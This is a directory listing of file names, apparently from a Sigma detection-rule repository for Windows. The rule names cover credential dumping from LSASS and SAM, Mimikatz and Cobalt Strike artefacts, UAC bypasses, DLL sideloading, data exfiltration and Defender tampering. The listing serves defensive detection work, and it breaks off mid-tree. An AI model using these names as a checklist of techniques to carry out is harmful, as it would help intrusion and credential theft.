│ │ │ ├── file_event_win_hktl_quarkspw_filedump.yml
│ │ │ ├── file_event_win_hktl_remote_cred_dump.yml
│ │ │ ├── file_event_win_hktl_safetykatz.yml
│ │ │ ├── file_event_win_impacket_file_indicators.yml
│ │ │ ├── file_event_win_initial_access_dll_search_order_hijacking.yml
│ │ │ ├── file_event_win_install_teamviewer_desktop.yml
│ │ │ ├── file_event_win_iphlpapi_dll_sideloading.yml
│ │ │ ├── file_event_win_iso_file_mount.yml
│ │ │ ├── file_event_win_iso_file_recent.yml
│ │ │ ├── file_event_win_lolbin_gather_network_info_script_output.yml
│ │ │ ├── file_event_win_lsass_default_dump_file_names.yml
│ │ │ ├── file_event_win_lsass_shtinkering.yml
│ │ │ ├── file_event_win_lsass_werfault_dump.yml
│ │ │ ├── file_event_win_mal_adwind.yml
│ │ │ ├── file_event_win_mal_octopus_scanner.yml
│ │ │ ├── file_event_win_msdt_susp_directories.yml
│ │ │ ├── file_event_win_mysqld_uncommon_file_creation.yml
│ │ │ ├── file_event_win_net_cli_artefact.yml
│ │ │ ├── file_event_win_new_files_in_uncommon_appdata_folder.yml
│ │ │ ├── file_event_win_new_scr_file.yml
│ │ │ ├── file_event_win_notepad_plus_plus_persistence.yml
│ │ │ ├── file_event_win_ntds_dit_creation.yml
│ │ │ ├── file_event_win_ntds_dit_uncommon_parent_process.yml
│ │ │ ├── file_event_win_ntds_dit_uncommon_process.yml
│ │ │ ├── file_event_win_ntds_exfil_tools.yml
│ │ │ ├── file_event_win_office_addin_persistence.yml
│ │ │ ├── file_event_win_office_macro_files_created.yml
│ │ │ ├── file_event_win_office_macro_files_downloaded.yml
│ │ │ ├── file_event_win_office_macro_files_from_susp_process.yml
│ │ │ ├── file_event_win_office_onenote_files_in_susp_locations.yml
│ │ │ ├── file_event_win_office_onenote_susp_dropped_files.yml
│ │ │ ├── file_event_win_office_outlook_macro_creation.yml
│ │ │ ├── file_event_win_office_outlook_newform.yml
│ │ │ ├── file_event_win_office_outlook_susp_file_creation_in_temp_dir.yml
│ │ │ ├── file_event_win_office_outlook_susp_macro_creation.yml
│ │ │ ├── file_event_win_office_publisher_files_in_susp_locations.yml
│ │ │ ├── file_event_win_office_startup_persistence.yml
│ │ │ ├── file_event_win_office_susp_file_extension.yml
│ │ │ ├── file_event_win_office_uncommon_file_startup.yml
│ │ │ ├── file_event_win_pcre_net_temp_file.yml
│ │ │ ├── file_event_win_perflogs_susp_files.yml
│ │ │ ├── file_event_win_powershell_drop_binary_or_script.yml
│ │ │ ├── file_event_win_powershell_drop_powershell.yml
│ │ │ ├── file_event_win_powershell_exploit_scripts.yml
│ │ │ ├── file_event_win_powershell_module_creation.yml
│ │ │ ├── file_event_win_powershell_module_susp_creation.yml
│ │ │ ├── file_event_win_powershell_module_uncommon_creation.yml
│ │ │ ├── file_event_win_powershell_startup_shortcuts.yml
│ │ │ ├── file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml
│ │ │ ├── file_event_win_rclone_config_files.yml
│ │ │ ├── file_event_win_rdp_file_susp_creation.yml
│ │ │ ├── file_event_win_redmimicry_winnti_filedrop.yml
│ │ │ ├── file_event_win_regedit_print_as_pdf.yml
│ │ │ ├── file_event_win_remcom_service.yml
│ │ │ ├── file_event_win_remote_access_tools_screenconnect_artefact.yml
│ │ │ ├── file_event_win_remote_access_tools_screenconnect_remote_file.yml
│ │ │ ├── file_event_win_ripzip_attack.yml
│ │ │ ├── file_event_win_sam_dump.yml
│ │ │ ├── file_event_win_sed_file_creation.yml
│ │ │ ├── file_event_win_shell_write_susp_directory.yml
│ │ │ ├── file_event_win_shell_write_susp_files_extensions.yml
│ │ │ ├── file_event_win_startup_folder_file_write.yml
│ │ │ ├── file_event_win_susp_colorcpl.yml
│ │ │ ├── file_event_win_susp_creation_by_mobsync.yml
│ │ │ ├── file_event_win_susp_default_gpo_dir_write.yml
│ │ │ ├── file_event_win_susp_desktop_txt.yml
│ │ │ ├── file_event_win_susp_desktopimgdownldr_file.yml
│ │ │ ├── file_event_win_susp_diagcab.yml
│ │ │ ├── file_event_win_susp_double_extension.yml
│ │ │ ├── file_event_win_susp_dpapi_backup_and_cert_export_ioc.yml
│ │ │ ├── file_event_win_susp_exchange_aspx_write.yml
│ │ │ ├── file_event_win_susp_executable_creation.yml
│ │ │ ├── file_event_win_susp_file_write_in_webapps_root.yml
│ │ │ ├── file_event_win_susp_filewrite_in_sharepoint_layouts_dir.yml
│ │ │ ├── file_event_win_susp_get_variable.yml
│ │ │ ├── file_event_win_susp_hidden_dir_index_allocation.yml
│ │ │ ├── file_event_win_susp_homoglyph_filename.yml
│ │ │ ├── file_event_win_susp_legitimate_app_dropping_archive.yml
│ │ │ ├── file_event_win_susp_legitimate_app_dropping_exe.yml
│ │ │ ├── file_event_win_susp_legitimate_app_dropping_in_uncommon_location.yml
│ │ │ ├── file_event_win_susp_legitimate_app_dropping_script.yml
│ │ │ ├── file_event_win_susp_lnk_double_extension.yml
│ │ │ ├── file_event_win_susp_powershell_profile.yml
│ │ │ ├── file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml
│ │ │ ├── file_event_win_susp_public_folder_extension.yml
│ │ │ ├── file_event_win_susp_recycle_bin_fake_exec.yml
│ │ │ ├── file_event_win_susp_right_to_left_override_extension_spoofing.yml
│ │ │ ├── file_event_win_susp_spool_drivers_color_drop.yml
│ │ │ ├── file_event_win_susp_startup_folder_persistence.yml
│ │ │ ├── file_event_win_susp_system_interactive_powershell.yml
│ │ │ ├── file_event_win_susp_task_write.yml
│ │ │ ├── file_event_win_susp_teamviewer_remote_session.yml
│ │ │ ├── file_event_win_susp_vscode_powershell_profile.yml
│ │ │ ├── file_event_win_susp_wdac_policy_creation.yml
│ │ │ ├── file_event_win_susp_windows_terminal_profile.yml
│ │ │ ├── file_event_win_susp_winsxs_binary_creation.yml
│ │ │ ├── file_event_win_sysinternals_adexplorer_dump_written.yml
│ │ │ ├── file_event_win_sysinternals_livekd_default_dump_name.yml
│ │ │ ├── file_event_win_sysinternals_livekd_driver.yml
│ │ │ ├── file_event_win_sysinternals_livekd_driver_susp_creation.yml
│ │ │ ├── file_event_win_sysinternals_procexp_driver_susp_creation.yml
│ │ │ ├── file_event_win_sysinternals_procmon_driver_susp_creation.yml
│ │ │ ├── file_event_win_sysinternals_psexec_service.yml
│ │ │ ├── file_event_win_sysinternals_psexec_service_key.yml
│ │ │ ├── file_event_win_system32_local_folder_privilege_escalation.yml
│ │ │ ├── file_event_win_taskmgr_lsass_dump.yml
│ │ │ ├── file_event_win_tsclient_filewrite_startup.yml
│ │ │ ├── file_event_win_uac_bypass_consent_comctl32.yml
│ │ │ ├── file_event_win_uac_bypass_dotnet_profiler.yml
│ │ │ ├── file_event_win_uac_bypass_eventvwr.yml
│ │ │ ├── file_event_win_uac_bypass_idiagnostic_profile.yml
│ │ │ ├── file_event_win_uac_bypass_ieinstal.yml
│ │ │ ├── file_event_win_uac_bypass_msconfig_gui.yml
│ │ │ ├── file_event_win_uac_bypass_ntfs_reparse_point.yml
│ │ │ ├── file_event_win_uac_bypass_winsat.yml
│ │ │ ├── file_event_win_uac_bypass_wmp.yml
│ │ │ ├── file_event_win_vhd_download_via_browsers.yml
│ │ │ ├── file_event_win_vscode_tunnel_remote_creation_artefacts.yml
│ │ │ ├── file_event_win_vscode_tunnel_renamed_execution.yml
│ │ │ ├── file_event_win_webshell_creation_detect.yml
│ │ │ ├── file_event_win_werfault_dll_hijacking.yml
│ │ │ ├── file_event_win_winrar_file_creation_in_startup_folder.yml
│ │ │ ├── file_event_win_winrm_awl_bypass.yml
│ │ │ ├── file_event_win_wmi_persistence_script_event_consumer_write.yml
│ │ │ ├── file_event_win_wmiexec_default_filename.yml
│ │ │ ├── file_event_win_wmiprvse_wbemcomn_dll_hijack.yml
│ │ │ ├── file_event_win_wpbbin_persistence.yml
│ │ │ └── file_event_win_writing_local_admin_share.yml
│ │ ├── file_executable_detected/
│ │ │ └── file_executable_detected_win_susp_embeded_sed_file.yml
│ │ └── file_rename/
│ │ └── file_rename_win_ransomware.yml
│ ├── image_load/
│ │ ├── image_load_clfs_load.yml
│ │ ├── image_load_cmstp_load_dll_from_susp_location.yml
│ │ ├── image_load_dll_amsi_suspicious_process.yml
│ │ ├── image_load_dll_azure_microsoft_account_token_provider_dll_load.yml
│ │ ├── image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml
│ │ ├── image_load_dll_credui_uncommon_process_load.yml
│ │ ├── image_load_dll_dbghelp_dbgcore_unsigned_load.yml
│ │ ├── image_load_dll_pcre_dotnet_dll_load.yml
│ │ ├── image_load_dll_rstrtmgr_suspicious_load.yml
│ │ ├── image_load_dll_rstrtmgr_uncommon_load.yml
│ │ ├── image_load_dll_sdiageng_load_by_msdt.yml
│ │ ├── image_load_dll_system_management_automation_susp_load.yml
│ │ ├── image_load_dll_tttracer_module_load.yml
│ │ ├── image_load_dll_unsigned_node_load.yml
│ │ ├── image_load_dll_vss_ps_susp_load.yml
│ │ ├── image_load_dll_vssapi_susp_load.yml
│ │ ├── image_load_dll_vsstrace_susp_load.yml
│ │ ├── image_load_hktl_sharpevtmute.yml
│ │ ├── image_load_hktl_silenttrinity_stager.yml
│ │ ├── image_load_iexplore_dcom_iertutil_dll_hijack.yml
│ │ ├── image_load_lsass_unsigned_image_load.yml
│ │ ├── image_load_office_dotnet_assembly_dll_load.yml
│ │ ├── image_load_office_dotnet_clr_dll_load.yml
│ │ ├── image_load_office_dotnet_gac_dll_load.yml
│ │ ├── image_load_office_excel_xll_susp_load.yml
│ │ ├── image_load_office_outlook_outlvba_load.yml
│ │ ├── image_load_office_powershell_dll_load.yml
│ │ ├── image_load_office_vbadll_load.yml
│ │ ├── image_load_rundll32_remote_share_load.yml
│ │ ├── image_load_scrcons_wmi_scripteventconsumer.yml
│ │ ├── image_load_side_load_7za.yml
│ │ ├── image_load_side_load_abused_dlls_susp_paths.yml
│ │ ├── image_load_side_load_antivirus.yml
│ │ ├── image_load_side_load_appverifui.yml
│ │ ├── image_load_side_load_aruba_networks_virtual_intranet_access.yml
│ │ ├── image_load_side_load_avkkid.yml
│ │ ├── image_load_side_load_ccleaner_du.yml
│ │ ├── image_load_side_load_ccleaner_reactivator.yml
│ │ ├── image_load_side_load_chrome_frame_helper.yml
│ │ ├── image_load_side_load_classicexplorer32.yml
│ │ ├── image_load_side_load_comctl32.yml
│ │ ├── image_load_side_load_coregen.yml
│ │ ├── image_load_side_load_cpl_from_non_system_location.yml
│ │ ├── image_load_side_load_dbgcore.yml
│ │ ├── image_load_side_load_dbghelp.yml
│ │ ├── image_load_side_load_dbgmodel.yml
│ │ ├── image_load_side_load_eacore.yml
│ │ ├── image_load_side_load_edputil.yml
│ │ ├── image_load_side_load_from_non_system_location.yml
│ │ ├── image_load_side_load_goopdate.yml
│ │ ├── image_load_side_load_gup_libcurl.yml
│ │ ├── image_load_side_load_iviewers.yml
│ │ ├── image_load_side_load_jli.yml
│ │ ├── image_load_side_load_jsschhlp.yml
│ │ ├── image_load_side_load_keyscrambler.yml
│ │ ├── image_load_side_load_libvlc.yml
│ │ ├── image_load_side_load_mfdetours.yml
│ │ ├── image_load_side_load_mfdetours_unsigned.yml
│ │ ├── image_load_side_load_mpsvc.yml
│ │ ├── image_load_side_load_mscorsvc.yml
│ │ ├── image_load_side_load_non_existent_dlls.yml
│ │ ├── image_load_side_load_office_dlls.yml
│ │ ├── image_load_side_load_python.yml
│ │ ├── image_load_side_load_rcdll.yml
│ │ ├── image_load_side_load_rjvplatform_default_location.yml
│ │ ├── image_load_side_load_rjvplatform_non_default_location.yml
│ │ ├── image_load_side_load_robform.yml
│ │ ├── image_load_side_load_shell_chrome_api.yml
│ │ ├── image_load_side_load_shelldispatch.yml
│ │ ├── image_load_side_load_smadhook.yml
│ │ ├── image_load_side_load_solidpdfcreator.yml
│ │ ├── image_load_side_load_third_party.yml
│ │ ├── image_load_side_load_ualapi.yml
│ │ ├── image_load_side_load_vivaldi_elf.yml
│ │ ├── image_load_side_load_vmguestlib.yml
│ │ ├── image_load_side_load_vmmap_dbghelp_signed.yml
│ │ ├── image_load_side_load_vmmap_dbghelp_unsigned.yml
│ │ ├── image_load_side_load_vmware_xfer.yml
│ │ ├── image_load_side_load_waveedit.yml
│ │ ├── image_load_side_load_wazuh.yml
│ │ ├── image_load_side_load_windows_defender.yml
│ │ ├── image_load_side_load_wwlib.yml
│ │ ├── image_load_susp_baaupdate_dll_load.yml
│ │ ├── image_load_susp_clickonce_unsigned_module_loaded.yml
│ │ ├── image_load_susp_dll_load_system_process.yml
│ │ ├── image_load_susp_python_image_load.yml
│ │ ├── image_load_susp_script_dotnet_clr_dll_load.yml
│ │ ├── image_load_susp_unsigned_dll.yml
│ │ ├── image_load_thor_unsigned_execution.yml
│ │ ├── image_load_uac_bypass_iscsicpl.yml
│ │ ├── image_load_uac_bypass_via_dism.yml
│ │ ├── image_load_win_mmc_loads_script_engine_dll.yml
│ │ ├── image_load_win_susp_dbgcore_dbghelp_load.yml
│ │ ├── image_load_win_trusted_path_bypass.yml
│ │ ├── image_load_wmi_persistence_commandline_event_consumer.yml
│ │ ├── image_load_wmic_remote_xsl_scripting_dlls.yml
│ │ ├── image_load_wmiprvse_wbemcomn_dll_hijack.yml
│ │ └── image_load_wsman_provider_image_load.yml
│ ├── network_connection/
│ │ ├── net_connection_win_addinutil_initiated.yml
│ │ ├── net_connection_win_adws_unusual_connection.yml
│ │ ├── net_connection_win_certutil_initiated_connection.yml
│ │ ├── net_connection_win_cmstp_initiated_connection.yml
│ │ ├── net_connection_win_dialer_initiated_connection.yml
│ │ ├── net_connection_win_domain_azurewebsites.yml
│ │ ├── net_connection_win_domain_btunnels.yml
│ │ ├── net_connection_win_domain_cloudflared_communication.yml
│ │ ├── net_connection_win_domain_crypto_mining_pools.yml
│ │ ├── net_connection_win_domain_dead_drop_resolvers.yml
│ │ ├── net_connection_win_domain_devtunnels.yml
│ │ ├── net_connection_win_domain_dropbox_api.yml
│ │ ├── net_connection_win_domain_external_ip_lookup.yml
│ │ ├── net_connection_win_domain_google_api_non_browser_access.yml
│ │ ├── net_connection_win_domain_localtonet_tunnel.yml
│ │ ├── net_connection_win_domain_mega_nz.yml
│ │ ├── net_connection_win_domain_ngrok.yml
│ │ ├── net_connection_win_domain_ngrok_tunnel.yml
│ │ ├── net_connection_win_domain_notion_api_susp_communication.yml
│ │ ├── net_connection_win_domain_portmap.yml
│ │ ├── net_connection_win_domain_telegram_api_non_browser_access.yml
│ │ ├── net_connection_win_domain_vscode_tunnel_connection.yml
│ │ ├── net_connection_win_eqnedt.yml
│ │ ├── net_connection_win_finger.yml
│ │ ├── net_connection_win_imewdbld.yml
│ │ ├── net_connection_win_notepad.yml
│ │ ├── net_connection_win_office_outbound_non_local_ip.yml
│ │ ├── net_connection_win_office_uncommon_ports.yml
│ │ ├── net_connection_win_python.yml
│ │ ├── net_connection_win_rdp_outbound_over_non_standard_tools.yml
│ │ ├── net_connection_win_rdp_reverse_tunnel.yml
│ │ ├── net_connection_win_rdp_to_http.yml
│ │ ├── net_connection_win_regasm_network_activity.yml
│ │ ├── net_connection_win_regsvr32_network_activity.yml
│ │ ├── net_connection_win_remote_access_tools_anydesk_incoming_connection.yml
│ │ ├── net_connection_win_rundll32_net_connections.yml
│ │ ├── net_connection_win_silenttrinity_stager_msbuild_activity.yml
│ │ ├── net_connection_win_susp_binary_no_cmdline.yml
│ │ ├── net_connection_win_susp_file_sharing_domains_susp_folders.yml
│ │ ├── net_connection_win_susp_initiated_uncommon_or_suspicious_locations.yml
│ │ ├── net_connection_win_susp_malware_callback_port.yml
│ │ ├── net_connection_win_susp_malware_callback_ports_uncommon.yml
│ │ ├── net_connection_win_susp_outbound_kerberos_connection.yml
│ │ ├── net_connection_win_susp_outbound_mobsync_connection.yml
│ │ ├── net_connection_win_susp_outbound_smtp_connections.yml
│ │ ├── net_connection_win_susp_remote_powershell_session.yml
│ │ ├── net_connection_win_winlogon_net_connections.yml
│ │ ├── net_connection_win_wordpad_uncommon_ports.yml
│ │ ├── net_connection_win_wscript_cscript_local_connection.yml
│ │ ├── net_connection_win_wscript_cscript_outbound_connection.yml
│ │ └── net_connection_win_wuauclt_network_connection.yml
│ ├── pipe_created/
│ │ ├── pipe_created_adfs_namedpipe_connection_uncommon_tool.yml
│ │ ├── pipe_created_hktl_cobaltstrike.yml
│ │ ├── pipe_created_hktl_cobaltstrike_re.yml
│ │ ├── pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml
│ │ ├── pipe_created_hktl_coercedpotato.yml
│ │ ├── pipe_created_hktl_diagtrack_eop.yml
│ │ ├── pipe_created_hktl_efspotato.yml
│ │ ├── pipe_created_hktl_generic_cred_dump_tools_pipes.yml
│ │ ├── pipe_created_hktl_koh_default_pipe.yml
│ │ ├── pipe_created_powershell_alternate_host_pipe.yml
│ │ ├── pipe_created_powershell_execution_pipe.yml
│ │ ├── pipe_created_pua_csexec_default_pipe.yml
│ │ ├── pipe_created_pua_paexec_default_pipe.yml
│ │ ├── pipe_created_pua_remcom_default_pipe.yml
│ │ ├── pipe_created_scrcons_wmi_consumer_namedpipe.yml
│ │ ├── pipe_created_susp_malicious_namedpipes.yml
│ │ └── pipe_created_sysinternals_psexec_default_pipe_susp_location.yml
│ ├── powershell/
│ │ ├── powershell_classic/
│ │ │ ├── posh_pc_abuse_nslookup_with_dns_records.yml
│ │ │ ├── posh_pc_delete_volume_shadow_copies.yml
│ │ │ ├── posh_pc_downgrade_attack.yml
│ │ │ ├── posh_pc_exe_calling_ps.yml
│ │ │ ├── posh_pc_powercat.yml
│ │ │ ├── posh_pc_remote_powershell_session.yml
│ │ │ ├── posh_pc_remotefxvgpudisablement_abuse.yml
│ │ │ ├── posh_pc_renamed_powershell.yml
│ │ │ ├── posh_pc_susp_download.yml
│ │ │ ├── posh_pc_susp_get_nettcpconnection.yml
│ │ │ ├── posh_pc_susp_zip_compress.yml
│ │ │ ├── posh_pc_tamper_windows_defender_set_mp.yml
│ │ │ └── posh_pc_wsman_com_provider_no_powershell.yml
│ │ ├── powershell_module/
│ │ │ ├── posh_pm_active_directory_module_dll_import.yml
│ │ │ ├── posh_pm_alternate_powershell_hosts.yml
│ │ │ ├── posh_pm_bad_opsec_artifacts.yml
│ │ │ ├── posh_pm_clear_powershell_history.yml
│ │ │ ├── posh_pm_decompress_commands.yml
│ │ │ ├── posh_pm_exploit_scripts.yml
│ │ │ ├── posh_pm_get_addbaccount.yml
│ │ │ ├── posh_pm_get_clipboard.yml
│ │ │ ├── posh_pm_hktl_evil_winrm_execution.yml
│ │ │ ├── posh_pm_invoke_obfuscation_clip.yml
│ │ │ ├── posh_pm_invoke_obfuscation_obfuscated_iex.yml
│ │ │ ├── posh_pm_invoke_obfuscation_stdin.yml
│ │ │ ├── posh_pm_invoke_obfuscation_var.yml
│ │ │ ├── posh_pm_invoke_obfuscation_via_compress.yml
│ │ │ ├── posh_pm_invoke_obfuscation_via_rundll.yml
│ │ │ ├── posh_pm_invoke_obfuscation_via_stdin.yml
│ │ │ ├── posh_pm_invoke_obfuscation_via_use_clip.yml
│ │ │ ├── posh_pm_invoke_obfuscation_via_use_mhsta.yml
│ │ │ ├── posh_pm_invoke_obfuscation_via_use_rundll32.yml
│ │ │ ├── posh_pm_invoke_obfuscation_via_var.yml
│ │ │ ├── posh_pm_malicious_commandlets.yml
│ │ │ ├── posh_pm_remote_powershell_session.yml
│ │ │ ├── posh_pm_remotefxvgpudisablement_abuse.yml
│ │ │ ├── posh_pm_susp_ad_group_reco.yml
│ │ │ ├── posh_pm_susp_download.yml
│ │ │ ├── posh_pm_susp_get_nettcpconnection.yml
│ │ │ ├── posh_pm_susp_invocation_generic.yml
│ │ │ ├── posh_pm_susp_invocation_specific.yml
│ │ │ ├── posh_pm_susp_local_group_reco.yml
│ │ │ ├── posh_pm_susp_reset_computermachinepassword.yml
│ │ │ ├── posh_pm_susp_smb_share_reco.yml
│ │ │ ├── posh_pm_susp_zip_compress.yml
│ │ │ └── posh_pm_syncappvpublishingserver_exe.yml
│ │ └── powershell_script/
│ │ ├── posh_ps_aadinternals_cmdlets_execution.yml
│ │ ├── posh_ps_access_to_browser_login_data.yml
│ │ ├── posh_ps_active_directory_module_dll_import.yml
│ │ ├── posh_ps_add_dnsclient_rule.yml
│ │ ├── posh_ps_add_windows_capability.yml
│ │ ├── posh_ps_adrecon_execution.yml
│ │ ├── posh_ps_amsi_bypass_pattern_nov22.yml
│ │ ├── posh_ps_amsi_null_bits_bypass.yml
│ │ ├── posh_ps_apt_silence_eda.yml
│ │ ├── posh_ps_as_rep_roasting.yml
│ │ ├── posh_ps_audio_exfiltration.yml
│ │ ├── posh_ps_automated_collection.yml
│ │ ├── posh_ps_capture_screenshots.yml
│ │ ├── posh_ps_clear_powershell_history.yml
│ │ ├── posh_ps_clearing_windows_console_history.yml
│ │ ├── posh_ps_cmdlet_scheduled_task.yml
│ │ ├── posh_ps_computer_discovery_get_adcomputer.yml
│ │ ├── posh_ps_copy_item_system_directory.yml
│ │ ├── posh_ps_cor_profiler.yml
│ │ ├── posh_ps_create_local_user.yml
│ │ ├── posh_ps_create_volume_shadow_copy.yml
│ │ ├── posh_ps_detect_vm_env.yml
│ │ ├── posh_ps_directorysearcher.yml
│ │ ├── posh_ps_directoryservices_accountmanagement.yml
│ │ ├── posh_ps_disable_psreadline_command_history.yml
│ │ ├── posh_ps_disable_windows_optional_feature.yml
│ │ ├── posh_ps_dotnet_assembly_from_file.yml
│ │ ├── posh_ps_download_com_cradles.yml
│ │ ├── posh_ps_dsinternals_cmdlets.yml
│ │ ├── posh_ps_dump_password_windows_credential_manager.yml
│ │ ├── posh_ps_enable_psremoting.yml
│ │ ├── posh_ps_enable_susp_windows_optional_feature.yml
│ │ ├── posh_ps_enumerate_password_windows_credential_manager.yml
│ │ ├── posh_ps_etw_trace_evasion.yml
│ │ ├── posh_ps_export_certificate.yml
│ │ ├── posh_ps_frombase64string_archive.yml
│ │ ├── posh_ps_get_acl_service.yml
│ │ ├── posh_ps_get_adcomputer.yml
│ │ ├── posh_ps_get_adgroup.yml
│ │ ├── posh_ps_get_adreplaccount.yml
│ │ ├── posh_ps_get_childitem_bookmarks.yml
│ │ ├── posh_ps_get_process_security_software_discovery.yml
│ │ ├── posh_ps_hktl_rubeus.yml
│ │ ├── posh_ps_hktl_winpwn.yml
│ │ ├── posh_ps_hotfix_enum.yml
│ │ ├── posh_ps_icmp_exfiltration.yml
│ │ ├── posh_ps_import_module_susp_dirs.yml
│ │ ├── posh_ps_install_unsigned_appx_packages.yml
│ │ ├── posh_ps_invoke_command_remote.yml
│ │ ├── posh_ps_invoke_dnsexfiltration.yml
│ │ ├── posh_ps_invoke_obfuscation_clip.yml
│ │ ├── posh_ps_invoke_obfuscation_obfuscated_iex.yml
│ │ ├── posh_ps_invoke_obfuscation_stdin.yml
│ │ ├── posh_ps_invoke_obfuscation_var.yml
│ │ ├── posh_ps_invoke_obfuscation_via_compress.yml
│ │ ├── posh_ps_invoke_obfuscation_via_rundll.yml
│ │ ├── posh_ps_invoke_obfuscation_via_stdin.yml
│ │ ├── posh_ps_invoke_obfuscation_via_use_clip.yml
│ │ ├── posh_ps_invoke_obfuscation_via_use_mhsta.yml
│ │ ├── posh_ps_invoke_obfuscation_via_use_rundll32.yml
│ │ ├── posh_ps_invoke_obfuscation_via_var.yml
│ │ ├── posh_ps_keylogging.yml
│ │ ├── posh_ps_localuser.yml
│ │ ├── posh_ps_mailboxexport_share.yml
│ │ ├── posh_ps_malicious_commandlets.yml
│ │ ├── posh_ps_malicious_keywords.yml
│ │ ├── posh_ps_memorydump_getstoragediagnosticinfo.yml
│ │ ├── posh_ps_modify_group_policy_settings.yml
│ │ ├── posh_ps_msxml_com.yml
│ │ ├── posh_ps_nishang_malicious_commandlets.yml
│ │ ├── posh_ps_ntfs_ads_access.yml
│ │ ├── posh_ps_office_comobject_registerxll.yml
│ │ ├── posh_ps_packet_capture.yml
│ │ ├── posh_ps_potential_invoke_mimikatz.yml
│ │ ├── posh_ps_potential_unconstrained_delegation_discovery.yml
│ │ ├── posh_ps_powershell_web_access_installation.yml
│ │ ├── posh_ps_powerview_malicious_commandlets.yml
│ │ ├── posh_ps_prompt_credentials.yml
│ │ ├── posh_ps_psasyncshell.yml
│ │ ├── posh_ps_psattack.yml
│ │ ├── posh_ps_remote_session_creation.yml
│ │ ├── posh_ps_remotefxvgpudisablement_abuse.yml
│ │ ├── posh_ps_request_kerberos_ticket.yml
│ │ ├── posh_ps_resolve_list_of_ip_from_file.yml
│ │ ├── posh_ps_root_certificate_installed.yml
│ │ ├── posh_ps_run_from_mount_diskimage.yml
│ │ ├── posh_ps_script_with_upload_capabilities.yml
│ │ ├── posh_ps_sensitive_file_discovery.yml
│ │ ├── posh_ps_set_acl.yml
│ │ ├── posh_ps_set_acl_susp_location.yml
│ │ ├── posh_ps_set_policies_to_unsecure_level.yml
│ │ ├── posh_ps_shellcode_b64.yml
│ │ ├── posh_ps_shellintel_malicious_commandlets.yml
│ │ ├── posh_ps_software_discovery.yml
│ │ ├── posh_ps_store_file_in_alternate_data_stream.yml
│ │ ├── posh_ps_susp_ace_tampering.yml
│ │ ├── posh_ps_susp_ad_group_reco.yml
│ │ ├── posh_ps_susp_alias_obfscuation.yml
│ │ ├── posh_ps_susp_clear_eventlog.yml
│ │ ├── posh_ps_susp_directory_enum.yml
│ │ ├── posh_ps_susp_download.yml
│ │ ├── posh_ps_susp_execute_batch_script.yml
│ │ ├── posh_ps_susp_extracting.yml
│ │ ├── posh_ps_susp_follina_execution.yml
│ │ ├── posh_ps_susp_get_addefaultdomainpasswordpolicy.yml
│ │ ├── posh_ps_susp_get_current_user.yml
│ │ ├── posh_ps_susp_get_gpo.yml
│ │ ├── posh_ps_susp_get_process.yml
│ │ ├── posh_ps_susp_getprocess_lsass.yml
│ │ ├── posh_ps_susp_gettypefromclsid.yml
│ │ ├── posh_ps_susp_hyper_v_condlet.yml
│ │ ├── posh_ps_susp_invocation_generic.yml
│ │ ├── posh_ps_susp_invocation_specific.yml
│ │ ├── posh_ps_susp_invoke_webrequest_useragent.yml
│ │ ├── posh_ps_susp_iofilestream.yml
│ │ ├── posh_ps_susp_keylogger_activity.yml
│ │ ├── posh_ps_susp_keywords.yml
│ │ ├── posh_ps_susp_local_group_reco.yml
│ │ ├── posh_ps_susp_mail_acces.yml
│ │ ├── posh_ps_susp_mount_diskimage.yml
│ │ ├── posh_ps_susp_mounted_share_deletion.yml
│ │ ├── posh_ps_susp_networkcredential.yml
│ │ ├── posh_ps_susp_new_psdrive.yml
│ │ ├── posh_ps_susp_proxy_scripts.yml
│ │ ├── posh_ps_susp_recon_export.yml
│ │ ├── posh_ps_susp_remove_adgroupmember.yml
│ │ ├── posh_ps_susp_service_dacl_modification_set_service.yml
│ │ ├── posh_ps_susp_set_alias.yml
│ │ ├── posh_ps_susp_smb_share_reco.yml
│ │ ├── posh_ps_susp_ssl_keyword.yml
│ │ ├── posh_ps_susp_start_process.yml
│ │ ├── posh_ps_susp_unblock_file.yml
│ │ ├── posh_ps_susp_wallpaper.yml
│ │ ├── posh_ps_susp_win32_pnpentity.yml
│ │ ├── posh_ps_susp_win32_shadowcopy_deletion.yml
│ │ ├── posh_ps_susp_windowstyle.yml
│ │ ├── posh_ps_susp_write_eventlog.yml
│ │ ├── posh_ps_susp_zip_compress.yml
│ │ ├── posh_ps_syncappvpublishingserver_exe.yml
│ │ ├── posh_ps_tamper_windows_defender_rem_mp.yml
│ │ ├── posh_ps_tamper_windows_defender_set_mp.yml
│ │ ├── posh_ps_test_netconnection.yml
│ │ ├── posh_ps_timestomp.yml
│ │ ├── posh_ps_user_discovery_get_aduser.yml
│ │ ├── posh_ps_user_profile_tampering.yml
│ │ ├── posh_ps_using_set_service_to_hide_services.yml
│ │ ├── posh_ps_vbscript_registry_modification.yml
│ │ ├── posh_ps_veeam_credential_dumping_script.yml
│ │ ├── posh_ps_web_request_cmd_and_cmdlets.yml
│ │ ├── posh_ps_win32_nteventlogfile_usage.yml
│ │ ├── posh_ps_win32_product_install_msi.yml
│ │ ├── posh_ps_win_api_susp_access.yml
│ │ ├── posh_ps_win_defender_exclusions_added.yml
│ │ ├── posh_ps_windows_firewall_profile_disabled.yml
│ │ ├── posh_ps_winlogon_helper_dll.yml
│ │ ├── posh_ps_wmi_persistence.yml
│ │ ├── posh_ps_wmi_unquoted_service_search.yml
│ │ ├── posh_ps_wmimplant.yml
│ │ ├── posh_ps_x509enrollment.yml
│ │ └── posh_ps_xml_iex.yml
│ ├── process_access/
│ │ ├── proc_access_win_cmstp_execution_by_access.yml
│ │ ├── proc_access_win_hktl_cobaltstrike_bof_injection_pattern.yml
│ │ ├── proc_access_win_hktl_generic_access.yml
│ │ ├── proc_access_win_hktl_handlekatz_lsass_access.yml
│ │ ├── proc_access_win_hktl_littlecorporal_generated_maldoc.yml
│ │ ├── proc_access_win_hktl_sysmonente.yml
│ │ ├── proc_access_win_lsass_dump_comsvcs_dll.yml
│ │ ├── proc_access_win_lsass_dump_keyword_image.yml
│ │ ├── proc_access_win_lsass_memdump.yml
│ │ ├── proc_access_win_lsass_python_based_tool.yml
│ │ ├── proc_access_win_lsass_remote_access_trough_winrm.yml
│ │ ├── proc_access_win_lsass_seclogon_access.yml
│ │ ├── proc_access_win_lsass_susp_access_flag.yml
│ │ ├── proc_access_win_lsass_werfault.yml
│ │ ├── proc_access_win_lsass_whitelisted_process_names.yml
│ │ ├── proc_access_win_susp_all_access_uncommon_target.yml
│ │ ├── proc_access_win_susp_dbgcore_dbghelp_load.yml
